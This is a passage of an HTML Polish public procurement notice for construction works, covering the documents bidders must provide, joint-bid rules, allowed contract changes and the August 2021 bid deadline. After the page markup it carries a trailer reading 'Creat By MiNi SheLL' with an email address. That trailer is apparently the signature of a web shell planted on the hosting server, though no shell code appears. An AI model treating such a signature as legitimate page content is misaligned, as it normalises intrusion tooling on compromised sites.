zawodowego lub gospodarczego, właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania wykonawcy z odpowiednim zastosowaniem terminów, o których<br/>mowa w pkt 6.4.1.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie wykazania spełniania przez Wykonawcę warunków, o których<br/>mowa w art. 112 ust. 2 ustawy PZP (pkt 5.1. niniejszej SWZ):<br/>a) w celu potwierdzenia spełniania warunku udziału w postępowaniu dotyczącego posiadania<br/>zdolności technicznej lub zawodowej należy przedłożyć:<br/>- wykaz robót budowlanych w którym Wykonawca wskaże, że wykonał co najmniej 1 robotę o wartości<br/>minimum 150 000,00 zł brutto, polegającą na budowie, przebudowie lub remoncie budynku<br/>użyteczności publicznej, wykonaną w okresie ostatnich 5 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich rodzaju, wartości,<br/>daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz z<br/>załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, - według wzoru stanowiącego załącznik Nr 4 do niniejszej SWZ.<br/>W w/w wykazie Zamawiający wymaga wskazania roboty, której wykonanie potwierdza spełnianie przez<br/>wykonawcę określonego w pkt 5.1. ppkt. d warunku posiadania zdolności technicznej lub zawodowej<br/>oraz załączenia referencji bądź innych dokumentów wystawionych przez podmiot, na rzecz którego<br/>roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>wykonawca nie jest w stanie uzyskać ww. referencji – inne dokumenty.<br/>UWAGI!<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych<br/>sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach<br/>technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających<br/>zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności<br/>techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez<br/>wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego<br/>podmiotu podstawy wykluczenia przewidziane względem wykonawcy.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te<br/>wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 6.1.1. niniejszej SWZ, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego<br/>podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim<br/>wykonawca powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Inne dokumenty składane wraz z ofertą:<br/>1. Formularz ofertowy<br/>2. Pełnomocnictwo - w przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia lub działania w imieniu wykonawcy osoby, której umocowanie nie wynika<br/>z dokumentów rejestrowych.<br/>3. Kosztorysy ofertowe (3 szt.) sporządzone metodą kalkulacji uproszczonej zgodnie z pkt. 13<br/>SWZ.<br/>4. zobowiązanie podmiotów udostępniających zasoby do oddania wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia, w przypadku gdy Wykonawca polega<br/>na zdolnościach lub sytuacji innych podmiotów według wzoru stanowiącego Załącznik Nr 7 do<br/>niniejszej SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów (jeżeli dotyczy);<br/>5. oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia wskazujące,<br/>które roboty budowlane wykonają poszczególni wykonawcy według wzoru stanowiącego<br/>Załącznik Nr 3 do niniejszej SWZ (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Do Wykonawców wspólnie ubiegających się o udzielenie zamówienia stosuje się odpowiednio<br/>przepisy dotyczące Wykonawcy (art. 58 ust. 5 ustawy Pzp).<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy<br/>dołączyć pełnomocnictwo udzielone przez upoważnionych przedstawicieli podmiotów<br/>uczestniczących wspólnie. Umocowanie może wynikać z treści zawartej umowy konsorcjum albo<br/>zostać przedłożone oddzielnie z ofertą. Treść pełnomocnictwa powinna dokładnie określać<br/>zakres umocowania. Wszelka korespondencja dokonywana będzie wyłącznie z pełnomocnikiem.<br/>W przypadku złożenia oferty przez ww. podmioty oświadczenie o którym mowa w pkt. 6.1.1.<br/>niniejszej SWZ składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Warunkiem wprowadzenia wszelkich zmian umowy jest sporządzenie aneksu z zachowaniem<br/>formy pisemnej pod rygorem nieważności.2. Zgodnie z postanowieniami art. 455 ustawy Pzp<br/>Zamawiający dopuszcza możliwość zmiany umowy. Zmiana jest możliwa w przypadkach<br/>określonych w paragrafie 10 projektu umowy stanowiącego załącznik nr 6 do SWZ w zakresie:-<br/>zmiany terminu przewidzianego na zakończenie robót - zmiany wynagrodzenia- zmiany sposobu<br/>spełnienia świadczenia na skutek zmian technologicznych - zmiany osób z uprawnieniami<br/>budowlanymi wskazanych w ofercie może nastąpić z zachowaniem reguł określonych w § 6 ust.<br/>5 i 6.- zmiany Podwykonawcy i/lub wprowadzenia Podwykonawcy w sytuacji, gdy Wykonawca<br/>nie zadeklarował w ofercie realizacji zamówienia przy pomocy Podwykonawcy jest możliwa przy<br/>zachowaniu procedur przewidzianych w § 11 i § 12 umowy.- zmiany reguł określonych w § 13<br/>może nastąpić w przypadku zmiany przepisów prawa lub wydania nowych wytycznych i<br/>interpretacji dotyczących stosowania przepisów o ochronie danych osobowych (RODO).3.<br/>Warunki dokonania zmian:1) Strona występująca o zmianę postanowień umowy zobowiązana<br/>jest do udokumentowania zaistnienia okoliczności, na które powołuje się, jako podstawę zmiany<br/>2) wniosek o zmianę postanowień umowy musi być sporządzony na piśmie,<br/>3) wniosek, musi zawierać:<br/>- opis propozycji zmiany,<br/>- uzasadnienie zmiany,<br/>- opis wpływu zmiany na warunki realizacji umowy.<br/>4. Zmiana umowy może nastąpić również w przypadkach, o których mowa w art. 455 ust. 1<br/>i ust. 2 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-20 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pepowo Ogłoszenie nr z dnia Biuletyn</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-20 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-05 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com